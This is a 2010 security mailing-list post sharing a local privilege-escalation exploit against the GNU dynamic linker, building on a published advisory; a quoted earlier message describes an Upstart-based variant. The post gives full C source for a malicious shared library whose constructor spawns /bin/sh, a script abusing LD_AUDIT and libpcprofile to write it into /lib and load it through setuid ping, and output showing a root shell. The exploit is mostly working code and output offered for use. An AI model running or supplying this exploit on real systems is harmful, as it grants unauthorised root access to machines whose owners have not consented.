Re: [Pauldotcom] Privilege scalation with GNU ld dlopen

Tue, 09 Nov 2010 07:18:12 -0800 

Hi guys,


I finally found an easier way to gain root privileges, without
rebooting the computer.


The vulnerability can be used to upload a custom library to the
server and then execute a root shell.

The library is really simple (libevil.so)

----

#include <errno.h>
#include <unistd.h>

static void
__attribute__ ((constructor))
install (void)
{
  execl("/bin/sh", "/bin/sh", (char *) 0);
}

----

u...@host:~/$ cat ./run.sh

umask 0
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so"
ping
cat ./libevil.so > /lib/libevil.so
LD_AUDIT="libevil.so" ping


u...@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit
interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w
deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami
root
#


I hope it is helpful.

Regards,

Xavier Garcia




On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:
> Hi guys,
> 
> I am trying to find some ways to gain root access by using the
> vulnerability described in the advisory
> 
> http://marc.info/?l=full-disclosure&m=128776663124692&w=2
> 
> published by Tavis Ormandy.
> 
> The advisory states that Cron can be used to scalate privileges,
> but Cron does not accept files that are writable by the group or
> others, returning the error BAD FILE MODE.
> 
> I have been looking for alternative ways to gain root access, but
> there are not many places where it is possible.
> 
> I have found that Upstart (http://en.wikipedia.org/wiki/Upstart)
> does not check the permissions and happily reads the
> configuration files every time it restarts. This means that we can
> create a configuration file that will instruct Upstart to
> drop a root shell :)
> 
> 
> The down side is that we have to be patient and wait until the
> computer is rebooted, or use some social engineering.
> 
> 
> You can find more details at
> 
> http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html
> 
> 
> I hope this finding is interesting or usefull for the list.
> 
> Regards,
> 
> Xavier Garcia
> 
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Reply via email to